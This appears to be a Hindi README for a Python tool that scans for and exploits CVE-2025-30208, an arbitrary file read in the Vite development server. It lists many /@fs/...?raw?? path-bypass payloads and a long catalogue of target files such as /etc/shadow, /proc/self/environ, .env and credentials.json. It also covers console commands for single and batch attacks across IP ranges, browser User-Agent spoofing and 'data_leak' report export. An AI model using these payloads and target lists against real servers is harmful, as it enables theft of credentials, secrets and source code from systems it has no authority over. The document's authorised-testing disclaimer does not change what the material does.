
CVE‑2025‑30208 एक मध्यम-गंभीरता वाली मनमानी फ़ाइल पढ़ने की कमज़ोरी है जो Vite डेवलपमेंट सर्वर (एक लोकप्रिय फ्रंटएंड बिल्ड टूल) में पाई जाती है।
CVE-2025-30208 के लिए उद्यम-ग्रेड सुविधाओं के साथ उन्नत भेद्यता स्कैनर
Vite मनमानी फ़ाइल पठन भेद्यता का पता लगाने के लिए पेशेवर प्रवेश परीक्षण उपकरण
🚀 त्वरित प्रारंभ • 📋 विशेषताएँ • 🔧 उपयोग • 📊 उदाहरण • 🛡️ सुरक्षा
यह एक व्यापक भेद्यता स्कैनर है जिसे Vite डेवलपमेंट सर्वरों में CVE-2025-30208 भेद्यता का पता लगाने और उसका शोषण करने के लिए डिज़ाइन किया गया है। यह भेद्यता Vite के फ़ाइल सिस्टम एंडपॉइंट्स के माध्यम से मनमानी फ़ाइल पठन तक पहुँच की अनुमति देती है, जिससे संभावित रूप से संवेदनशील कॉन्फ़िगरेशन फ़ाइलें, स्रोत कोड और सिस्टम जानकारी उजागर हो सकती है।
उपकरण में अब बेहतर रखरखाव और विस्तार के लिए मॉड्यूलर आर्किटेक्चर है:
CVE-2025-30208.py - मुख्य स्कैनर एप्लिकेशनpayloads.py - उन्नत शोषण पेलोड (60+ विविधताएँ)sensitive_files.py - व्यापक संवेदनशील फ़ाइल डेटाबेस (200+ फ़ाइलें)html_template.py - उन्नत हैकर-शैली HTML रिपोर्टिंग टेम्पलेटpip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# विस्तृत आउटपुट के लिए वर्बोज़ मोड सक्षम करें
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[समाप्त करने के लिए Enter दो बार दबाएं]
CVE-2025-30208 > scan
# प्रॉक्सी कॉन्फ़िगर करें
CVE-2025-30208 > proxy
प्रॉक्सी दर्ज करें: http://127.0.0.1:8080
# कस्टम हेडर सेट करें
CVE-2025-30208 > headers
हेडर दर्ज करें: {"User-Agent": "Custom Scanner"}
# दर सीमित कॉन्फ़िगर करें
CVE-2025-30208 > rate
दर सीमा दर्ज करें: 1.0
# सुंदर HTML रिपोर्ट जनरेट करें
CVE-2025-30208 > pull
# रिपोर्ट देखने के लिए वेब सर्वर प्रारंभ करें
CVE-2025-30208 > web
# विशिष्ट पोर्ट पर वेब सर्वर प्रारंभ करें
CVE-2025-30208 > web 8081
# वेब सर्वर बंद करें
CVE-2025-30208 > web off
स्कैनर अब payloads.py में व्यवस्थित 60+ विभिन्न पेलोड विविधताओं का उपयोग करता है:
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html
/app/{file_path}?raw??
/App/{file_path}?raw??
उपकरण अब sensitive_files.py में व्यवस्थित 200+ संवेदनशील फ़ाइलों का परीक्षण करता है:
/etc/passwd - उपयोगकर्ता खाता जानकारी/etc/shadow - एन्क्रिप्टेड पासवर्ड डेटा/etc/services - नेटवर्क सेवाएँ/etc/hosts - होस्टनाम मैपिंग/etc/fstab - फ़ाइल सिस्टम तालिका/etc/ssh/sshd_config - SSH सर्वर कॉन्फ़िगरेशन/etc/crontab - सिस्टम क्रॉन जॉब्स/etc/sudoers - सूडो कॉन्फ़िगरेशन/proc/version - कर्नेल संस्करण/proc/cpuinfo - CPU जानकारी/proc/meminfo - मेमोरी जानकारी/proc/self/environ - प्रक्रिया पर्यावरण/proc/self/cmdline - प्रक्रिया कमांड लाइन/proc/net/tcp - TCP कनेक्शन/proc/net/udp - UDP कनेक्शन.env - पर्यावरण चर.env.local - स्थानीय पर्यावरण.env.production - उत्पादन पर्यावरणconfig.json - एप्लिकेशन कॉन्फ़िगरेशनsettings.json - एप्लिकेशन सेटिंग्सapplication.properties - Spring कॉन्फ़िगरेशनapplication.yml - YAML कॉन्फ़िगरेशनdatabase.yml - डेटाबेस कॉन्फ़िगरेशनsecrets.json - गुप्त प्रबंधनpackage.json - Node.js निर्भरताएँpackage-lock.json - लॉक की गई निर्भरताएँyarn.lock - Yarn लॉक फ़ाइलvite.config.js - Vite कॉन्फ़िगरेशनvite.config.ts - TypeScript Vite कॉन्फ़िगtsconfig.json - TypeScript कॉन्फ़िगरेशनwebpack.config.js - Webpack कॉन्फ़िगरेशनnext.config.js - Next.js कॉन्फ़िगरेशनnuxt.config.js - Nuxt.js कॉन्फ़िगरेशनangular.json - Angular कॉन्फ़िगरेशनvue.config.js - Vue.js कॉन्फ़िगरेशनrollup.config.js - Rollup कॉन्फ़िगरेशनeslint.config.js - ESLint कॉन्फ़िगरेशन.git/config - Git कॉन्फ़िगरेशन.gitignore - Git इग्नोर नियम.gitattributes - Git विशेषताएँ.gitmodules - Git सबमॉड्यूल.git/HEAD - वर्तमान ब्रांच.git/logs/HEAD - Git लॉग.git/refs/heads/master - मास्टर ब्रांच.git/refs/heads/main - मुख्य ब्रांचREADME.md - परियोजना दस्तावेज़ीकरणCHANGELOG.md - परिवर्तन लॉगLICENSE - लाइसेंस जानकारीCONTRIBUTING.md - योगदान दिशानिर्देशAUTHORS - लेखक जानकारीTODO.md - कार्य सूचीROADMAP.md - विकास रोडमैपDockerfile - Docker कॉन्फ़िगरेशनdocker-compose.yml - Docker Composedocker-compose.override.yml - ओवरराइड कॉन्फ़िगरेशन.dockerignore - Docker इग्नोर नियमdocker-compose.prod.yml - उत्पादन कॉन्फ़िगरेशनdocker-compose.dev.yml - डेवलपमेंट कॉन्फ़िगरेशनnginx.conf - Nginx कॉन्फ़िगरेशनapache2.conf - Apache कॉन्फ़िगरेशनhttpd.conf - HTTP डेमॉन कॉन्फ़िग.htaccess - Apache एक्सेस नियंत्रणweb.config - IIS कॉन्फ़िगरेशनrobots.txt - सर्च इंजन निर्देशsitemap.xml - साइट संरचनाmanifest.json - वेब ऐप मैनिफेस्टsw.js - सर्विस वर्करfirebase.json - Firebase कॉन्फ़िगरेशनfirebase.rules - Firebase सुरक्षा नियमboot.ini - बूट कॉन्फ़िगरेशनautoexec.bat - स्वचालित निष्पादन स्क्रिप्टsystem.ini - सिस्टम कॉन्फ़िगरेशनwin.ini - Windows कॉन्फ़िगरेशनUsers - उपयोगकर्ता निर्देशिकाएँWindows - सिस्टम फ़ाइलेंProgram Files - एप्लिकेशन निर्देशिकाएँSystem - सिस्टम फ़ाइलेंLibrary - लाइब्रेरी फ़ाइलेंApplications - एप्लिकेशन फ़ाइलेंprivate/etc/hosts - होस्ट्स फ़ाइलprivate/etc/passwd - उपयोगकर्ता खातेdatabase.db - SQLite डेटाबेसdatabase.sqlite - SQLite डेटाबेसdata.db - डेटा डेटाबेसdump.sql - डेटाबेस डंपschema.sql - डेटाबेस स्कीमाmigrations - डेटाबेस माइग्रेशनlogs - लॉग निर्देशिकाerror.log - त्रुटि लॉगaccess.log - एक्सेस लॉगapp.log - एप्लिकेशन लॉगdebug.log - डीबग लॉगcombined.log - संयुक्त लॉगbackup - बैकअप निर्देशिकाbackup.sql - डेटाबेस बैकअपbackup.zip - संपीड़ित बैकअपdump - डेटा डंपexport - डेटा निर्यातauth.json - प्रमाणीकरण कॉन्फ़िगरेशनcredentials.json - क्रेडेंशियल स्टोरेजkeys.json - कुंजी प्रबंधनtokens.json - टोकन स्टोरेजjwt.json - JWT कॉन्फ़िगरेशनoauth.json - OAuth कॉन्फ़िगरेशनapi.json - API कॉन्फ़िगरेशनswagger.json - API दस्तावेज़ीकरणopenapi.json - OpenAPI विनिर्देशgraphql.json - GraphQL कॉन्फ़िगरेशनschema.json - API स्कीमाcloudformation.yml - AWS CloudFormationserverless.yml - सर्वरलेस कॉन्फ़िगरेशनterraform.tf - Terraform कॉन्फ़िगरेशनkubernetes.yml - Kubernetes कॉन्फ़िगरेशनk8s.yml - Kubernetes कॉन्फ़िगरेशनanalytics.json - एनालिटिक्स कॉन्फ़िगरेशनmonitoring.json - मॉनिटरिंग सेटअपmetrics.json - मेट्रिक्स कॉन्फ़िगरेशनtelemetry.json - टेलीमेट्री डेटाउपकरण अब सुंदर हैकर-शैली HTML रिपोर्ट जनरेट करता है:
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch
CVE-2025-30208 > proxy
प्रॉक्सी दर्ज करें: http://127.0.0.1:8080
CVE-2025-30208 > headers
हेडर दर्ज करें: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan
CVE-2025-30208/
├── CVE-2025-30208.py # मुख्य स्कैनर एप्लिकेशन
├── payloads.py # उन्नत शोषण पेलोड (60+)
├── sensitive_files.py # संवेदनशील फ़ाइल डेटाबेस (200+)
├── html_template.py # उन्नत HTML रिपोर्टिंग टेम्पलेट
├── README.md # यह दस्तावेज़ीकरण
├── requirements.txt # Python निर्भरताएँ
├── logs/ # लॉग फ़ाइलें निर्देशिका
├── data_leak.html # जनरेट की गई HTML रिपोर्ट
├── data_leak.json # जनरेट की गई JSON रिपोर्ट
└── session.json # सहेजे गए सत्र कॉन्फ़िगरेशन
हम इस उपकरण को बेहतर बनाने के लिए योगदान का स्वागत करते हैं:
payloads.py में नई पेलोड विविधताएँsensitive_files.py में अतिरिक्त संवेदनशील फ़ाइल पैटर्नhtml_template.py में उन्नत HTML टेम्पलेटयह परियोजना केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए लाइसेंस प्राप्त है।
⚠️ कानूनी अस्वीकरण: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और अनुसंधान उद्देश्यों के लिए है। उपयोगकर्ता यह सुनिश्चित करने के लिए जिम्मेदार हैं कि किसी भी सिस्टम का परीक्षण करने से पहले उनके पास उचित प्राधिकरण है। लेखक इस उपकरण के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं हैं।
⭐ यदि इस उपकरण ने आपकी मदद की, तो कृपया इसे एक स्टार दें! ⭐
सुरक्षा समुदाय के लिए ❤️ के साथ बनाया गया
| कमांड | विवरण | उदाहरण |
|---|
set <option> <value> | कॉन्फ़िगरेशन विकल्प सेट करें | set RHOST 192.168.1.100 |
show options | वर्तमान सेटिंग्स प्रदर्शित करें | show options |
edit | इंटरैक्टिव विकल्प संपादक | edit |
run / exploit | भेद्यता परीक्षण चलाएँ | run |
batch | कई लक्ष्यों को बैच स्कैन करें | batch |
scan | संवेदनशील फ़ाइलें खोजें | scan |
pull | परिणामों को HTML/JSON में निर्यात करें | pull |
web [on|off|port] | HTML रिपोर्ट के लिए वेब सर्वर | web 8080 |
save | सत्र कॉन्फ़िगरेशन सहेजें | save |
load | सत्र कॉन्फ़िगरेशन लोड करें | load |
test | लक्ष्य से कनेक्टिविटी का परीक्षण करें | test |
validate | वर्तमान कॉन्फ़िगरेशन को मान्य करें | validate |
verbose | वर्बोज़ मोड टॉगल करें | verbose |
proxy | प्रॉक्सी सेटिंग्स कॉन्फ़िगर करें | proxy |
headers | कस्टम HTTP हेडर सेट करें | headers |
rate | दर सीमित कॉन्फ़िगर करें | rate |
log | लॉगिंग जानकारी दिखाएँ | log |
help / ? | सहायता दिखाएँ | help |
exit / quit | उपकरण से बाहर निकलें | exit |
| विकल्प | विवरण | डिफ़ॉल्ट | सत्यापन |
|---|
RHOST | लक्ष्य होस्ट/IP पता | - | होस्टनाम/IP सत्यापन |
RPORT | लक्ष्य पोर्ट नंबर | - | पोर्ट रेंज (1-65535) |
FILEPATH | परीक्षण करने के लिए फ़ाइल पथ | etc/passwd | पथ सत्यापन |
PROXY | HTTP/HTTPS प्रॉक्सी URL | - | URL प्रारूप सत्यापन |
VERBOSE | वर्बोज़ आउटपुट सक्षम करें | false | बूलियन सत्यापन |
RATE_LIMIT | अनुरोधों के बीच विलंब (सेकंड) | 0.3 | संख्यात्मक सत्यापन |
THREADS | बैच स्कैनिंग के लिए थ्रेड की संख्या | 5 | पूर्णांक सत्यापन |
TIMEOUT | अनुरोध टाइमआउट (सेकंड) | 5 | पूर्णांक सत्यापन |
CUSTOM_HEADERS | कस्टम HTTP हेडर (JSON) | {} | JSON प्रारूप सत्यापन |
prettier.config.js - Prettier कॉन्फ़िगरेशनjest.config.js - Jest कॉन्फ़िगरेशनbabel.config.js - Babel कॉन्फ़िगरेशनtailwind.config.js - Tailwind CSS कॉन्फ़िगरेशन| फ़ाइल | विवरण | प्रारूप |
|---|
data_leak.html | उन्नत हैकर-शैली HTML भेद्यता रिपोर्ट | HTML |
data_leak.json | संरचित JSON निर्यात | JSON |
sensitive_files_discovery.json | खोजी गई संवेदनशील फ़ाइलें | JSON |
session.json | सहेजा गया सत्र कॉन्फ़िगरेशन | JSON |
logs/cve_2025_30208_YYYYMMDD_HHMMSS.log | विस्तृत ऑडिट लॉग | टेक्स्ट |